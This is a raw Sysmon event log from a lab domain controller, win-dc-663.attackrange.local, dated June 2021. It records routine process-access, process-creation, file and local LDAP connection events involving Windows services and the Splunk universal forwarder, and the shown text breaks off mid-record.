21:00:54.739{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.739{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.739{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.739{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A106-60D3-5602-00000000CF01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.739{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A106-60D3-5602-00000000CF01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000018651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.739{4DB9351A-A106-60D3-5602-00000000CF01}6804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018650Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.582{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CE0F1AED3C4A1D6D71220BC01A90AC7B,SHA256=011F8599F63EEF42144DFABA45E8C22F73E7D2DF2F8AE1E940FA0ACCE458FEE2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018649Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.410{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A106-60D3-5502-00000000CF01}5348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018648Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.410{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A106-60D3-5502-00000000CF01}5348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018647Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.410{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A106-60D3-5502-00000000CF01}5348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.332{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A106-60D3-5402-00000000CF01}6556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.317{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A106-60D3-5402-00000000CF01}6556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.317{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A106-60D3-5402-00000000CF01}6556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.270{4DB9351A-A105-60D3-5202-00000000CF01}2680NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DPLOQ2F3NB\System.Data.Services.Design.ni.dll.auxMD5=2FCC4AC9B0011F923926BCF702C0F7BD,SHA256=69FE0DE1BB84C452FA0CE0B788148210434E36B35AF778AED6C6E89D176B11D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.270{4DB9351A-A105-60D3-5202-00000000CF01}2680NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DPLOQ2F3NB\System.Data.Services.Design.ni.dllMD5=26EBF1FBCCC03F5532D89A8296952D7D,SHA256=C12A1AD925C0E3ACA1CC9F23E34C3F18F5D7E80232174784FC4EB12FD7003C44,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:54.239{4DB9351A-A105-60D3-5202-00000000CF01}2680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a78-0\System.Data.Services.Design.dll2021-06-23 21:00:54.239 10341000x800000000000000018640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:54.020{4DB9351A-A105-60D3-5302-00000000CF01}39366908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000018639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.547{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61362-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000018638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.547{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61362-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 23542300x800000000000000018669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:55.989{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01601F3499F4F63AC9F5C649913B54BA,SHA256=4A71B0B2BBB2DD85BF36CCC3716D4F74B5129B1BA63A5C49E4C24AA9B1510C69,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:55.910{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A107-60D3-5702-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:55.910{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:55.910{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:55.910{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:55.910{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:55.910{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A107-60D3-5702-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:55.910{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A107-60D3-5702-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000018661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:55.911{4DB9351A-A107-60D3-5702-00000000CF01}3492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:55.739{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2EF989A4B6FA379B3EF353D0B28DA102,SHA256=F66ABEC05BB09553700CE205D2A80216425BC9B42952CF47A5618EE9CBDE6BBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:56.989{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=718621DEA45A155FD4827D2299D4CCFC,SHA256=82621D9DB83BA949268CFEAE75A3E912C35C1EAC13C7EF047CAE10E9641E226F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:56.926{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E9D6A824080961D491B7392EF2A01696,SHA256=4DBB577C942662B2B3CF6BD30E3D0C60DC912DA925410AA5E6517F0FA7D179A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:56.676{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A108-60D3-5902-00000000CF01}3604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 